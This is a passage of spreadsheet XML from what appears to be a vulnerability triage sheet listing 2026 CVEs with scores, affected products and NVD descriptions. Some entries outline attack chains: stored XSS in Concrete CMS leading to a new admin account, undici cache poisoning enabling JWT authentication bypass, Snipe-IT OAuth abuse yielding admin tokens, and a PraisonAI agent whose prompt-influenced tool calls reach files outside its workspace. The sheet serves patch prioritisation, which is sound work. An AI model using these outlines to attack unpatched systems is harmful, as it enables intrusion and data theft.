      <c r="P692" s="5" t="inlineStr"/>
      <c r="Q692" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R692" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85152</t>
        </is>
      </c>
      <c r="D693" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F693" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr"/>
      <c r="Q693" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R693" s="5" t="inlineStr">
        <is>
          <t>undici 8.10.0 omits the destination origin from the cache and request-deduplication keys when the cache or deduplicate interceptor is composed directly onto a Client or Pool. Because the internal cache key falls back to an empty origin string, a cacheable or in-flight response from one upstream origin is returned for a request to a different, trusted origin whenever the method, path, and relevant headers match, which permits cross-origin information disclosure and persistent cache poisoning. The reporter demonstrated a full authentication bypass in which a JWT signed with an attacker-controlled key was accepted as belonging to a trusted issuer, and the trusted origin was never contacted. This is a regression introduced in 8.10.0 and affects undici versions from 8.10.0 up to 8.10.2. Applications using an Agent, which carries the origin in its dispatch options, are not affected. Users should upgrade to undici 8.10.2.</t>
        </is>
      </c>
      <c r="S693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85152</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89157</t>
        </is>
      </c>
      <c r="D694" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr"/>
      <c r="Q694" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R694" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_pattern_convert out-of-bounds write when an attacker can provide a large pattern.</t>
        </is>
      </c>
      <c r="S694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89157</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56839</t>
        </is>
      </c>
      <c r="D695" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F695" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr"/>
      <c r="Q695" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-863</t>
        </is>
      </c>
      <c r="R695" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.59, the CODE_TOOLS wrappers keep _workspace_root as None and pass workspace=None to read_file, search_replace, and apply_diff helpers that enforce path containment only for a truthy workspace. An application that exposes code_read_file, code_search_replace, or code_apply_diff before set_workspace can therefore let prompt-influenced calls read and modify files outside the intended project directory, while explicitly configured workspaces remain effective. This vulnerability is fixed in 4.6.59.</t>
        </is>
      </c>
      <c r="S695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56839</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61409</t>
        </is>
      </c>
      <c r="D696" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F696" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr"/>
      <c r="Q696" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R696" s="5" t="inlineStr">
        <is>
          <t>Dell Secure Connect Gateway (SCG) 5.0 Application, versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="S696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61409</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64752</t>
        </is>
      </c>
      <c r="D697" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F697" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos</t>
        </is>
      </c>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr"/>
      <c r="Q697" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R697" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, visionOS 27. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
        </is>
      </c>
      <c r="S697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64752</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71179</t>
        </is>
      </c>
      <c r="D698" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F698" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr"/>
      <c r="Q698" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R698" s="5" t="inlineStr">
        <is>
          <t>Dell Update Package Framework, versions prior to 26.07.03, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="S698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71179</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78135</t>
        </is>
      </c>
      <c r="D699" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr"/>
      <c r="Q699" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="R699" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 5.9.7 through 6.0.7 mishandles behavioral workflow in the IKEv2 state machine. Because CREATE_CHILD_SA requests are mishandled, there can be an authentication bypass.</t>
        </is>
      </c>
      <c r="S699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78135</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79643</t>
        </is>
      </c>
      <c r="D700" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F700" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr"/>
      <c r="Q700" s="5" t="inlineStr">
        <is>
          <t>CWE-480</t>
        </is>
      </c>
      <c r="R700" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Incorrect Operator vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79643</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79691</t>
        </is>
      </c>
      <c r="D701" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F701" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr"/>
      <c r="Q701" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R701" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79691</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84611</t>
        </is>
      </c>
      <c r="D702" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F702" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr"/>
      <c r="Q702" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R702" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted 3D model may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84611</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84632</t>
        </is>
      </c>
      <c r="D703" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F703" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr"/>
      <c r="Q703" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R703" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted 3D model may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84632</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85386</t>
        </is>
      </c>
      <c r="D704" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F704" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr"/>
      <c r="Q704" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R704" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.4 did not sanitize XML and XSLT documents uploaded through a public Form Block file-upload question. Plain XML uploads were validated by file extension only and stored as publicly accessible files that were served inline from the application's own origin. An unauthenticated visitor could therefore store an XML document containing an xml-stylesheet processing instruction that referenced an attacker-supplied, same-origin XSLT stylesheet. When a victim opened the stored file directly in a browser, the browser fetched the stylesheet, transformed the document into HTML, and executed attacker-controlled JavaScript in the Concrete CMS origin (stored cross-site scripting). If the victim was an authenticated administrator, the script could act with that administrator's session, and the reporter demonstrated creation of a new user in the Administrators group. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Valentin SARRE (Independent security researcher) for reporting.</t>
        </is>
      </c>
      <c r="S704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85386</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86754</t>
        </is>
      </c>
      <c r="D705" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr"/>
      <c r="Q705" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R705" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate Laravel Passport's OAuth client management routes, allowing any authenticated user to register OAuth clients with attacker-controlled redirect URIs. Attackers can trick administrators into approving consent screens, then exchange authorization codes for bearer tokens inheriting full admin API permissions lasting up to 40 years.</t>
        </is>
      </c>
      <c r="S705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86754</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89910</t>
        </is>
      </c>
      <c r="D706" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F706" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr"/>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Fix uninitialized stack variable issue with dmsintc
Variable vector[] is declared on stack in function dmsintc_inject_irq()
and sometimes it is used without initialized. Here fix this issue.</t>
        </is>
      </c>
      <c r="S706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89910</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92399</t>
        </is>
      </c>
      <c r="D707" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr"/>
      <c r="Q707" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-122</t>
        </is>
      </c>
      <c r="R707" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in GPAC 26.07.0. This affects the function rmt_client_handle_ws_frame of the file src/utils/rmt_ws.c of the component WebSocket Handler. Executing a manipulation of the argument payload_size can lead to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version abi-16.26 is able to mitigate this issue. This patch is called 37bccbb30cf53a0e1a084cea9a1ce422b3ddfe12. Upgrading the affected component is recommended.</t>
        </is>
      </c>
      <c r="S707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92399</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92406</t>
        </is>
      </c>
      <c r="D708" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr"/>
      <c r="Q708" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R708" s="5" t="inlineStr">
        <is>
